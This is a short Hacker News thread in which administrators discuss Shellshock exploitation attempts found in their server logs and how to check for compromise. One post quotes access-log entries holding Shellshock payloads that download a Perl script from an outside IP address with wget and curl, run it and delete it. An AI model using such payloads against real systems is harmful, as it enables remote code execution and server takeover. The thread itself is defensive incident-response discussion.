Hacker Newsnew | past | comments | ask | show | jobs | submitlogin

Thanks for the idea. Looks like there is someone out there already trying to download and install remote shells:

    access.log:89.207.135.125 - - [25/Sep/2014:12:30:00 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 302 169 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
    access.log:146.71.113.194 - - [26/Sep/2014:00:26:04 +0000] "GET /cgi-bin/helpme HTTP/1.0" 302 169 "-" "() { :;}; /bin/bash -c \x22cd /tmp;wget http://213.5.67.223/jurat;curl -O /tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat*;rm -rf /tmp/jurat\x22"
    access.log:146.71.113.194 - - [26/Sep/2014:00:26:05 +0000] "GET /cgi-bin/helpme HTTP/1.0" 404 13272 "-" "() { :;}; /bin/bash -c \x22cd /tmp;wget http://213.5.67.223/jurat;curl -O /tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat*;rm -rf /tmp/jurat\x22"
Any suggestions on how to best check if they succeeded? I think I'm safe as I upgraded Ubuntu Bash right after the announcement, and run Nginx+Uwsgi instead of Apache with CGI enabled. But Nginx might set some environment variables somewhere as well.


I saw a similar thing in my apache log. I shut the machine down. I will check for changed files via `find` http://xmodulo.com/how-to-find-recently-modified-files-on-li... when I get the chance.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: